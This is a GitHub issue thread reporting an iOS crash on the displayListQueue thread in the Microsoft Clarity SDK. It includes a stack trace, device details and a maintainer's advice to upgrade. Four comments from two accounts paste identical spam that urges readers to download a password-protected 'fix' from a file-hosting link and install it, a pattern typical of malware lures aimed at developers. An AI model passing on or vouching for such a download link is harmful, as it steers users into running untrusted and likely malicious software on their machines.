### ISSUE TITLE
[BUG][iOS] crash：displayListQueue

### ISSUE THREAD

**Issue by CtrlJone** [microsoft/clarity-apps#57]
**Describe the Bug**

```
Crashed: displayListQueue
0  libobjc.A.dylib                0x1b60 objc_release_x0 + 16
1  libobjc.A.dylib                0x1b60 objc_release + 16
2  Clarity                        0xf6dc __swift_memcpy16_8 + 42084
3  Clarity                        0x5584 __swift_memcpy16_8 + 780
4  Clarity                        0xf03c0 __swift_memcpy72_8 + 40472
5  Clarity                        0xf0344 __swift_memcpy72_8 + 40348
6  Clarity                        0x792f8 __swift_project_value_buffer + 9376
7  libdispatch.dylib              0x213c _dispatch_call_block_and_release + 32
8  libdispatch.dylib              0x3dd4 _dispatch_client_callout + 20
9  libdispatch.dylib              0xb400 _dispatch_lane_serial_drain + 748
10 libdispatch.dylib              0xbf30 _dispatch_lane_invoke + 380
11 libdispatch.dylib              0x16cb4 _dispatch_root_queue_drain_deferred_wlh + 288
12 libdispatch.dylib              0x16528 _dispatch_workloop_worker_thread + 404
13 libsystem_pthread.dylib        0x4934 _pthread_wqthread + 288
14 libsystem_pthread.dylib        0x10cc start_wqthread + 8
```

**Screenshots**
<img width="1270" alt="image" src="https://github.com/user-attachments/assets/4f84c5c7-5f1a-4105-98f8-4771f545b7fb">

**Project Info**

- Project ID : nqsmdcx4pf

**Platform/Framework Info**

- Device: iPhone XS Max
- OS:  iOS 17.5.1
- Application Framework: Native UIKit-based
- Clarity Version 2.0.0

**Additional Context**
This is my code
<img width="977" alt="image" src="https://github.com/user-attachments/assets/8c28f175-415b-4aee-ae64-0623460b0a4a">

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by nouranmaher86** [comment]
@amralaa-MSFT Please check

**Comment by amralaa-MSFT** [comment]
Thanks @CtrlJone for reporting this issue. You've mentioned that you use Clarity version 2.0.0. However, we released version 2.1.0 few days ago in which we had fixes for similar issues. Could you please update Clarity and let us know if it resolves the issue?

**Comment by CtrlJone** [comment]
@amralaa-MSFT OK，let me try, thank you for you reply!!!
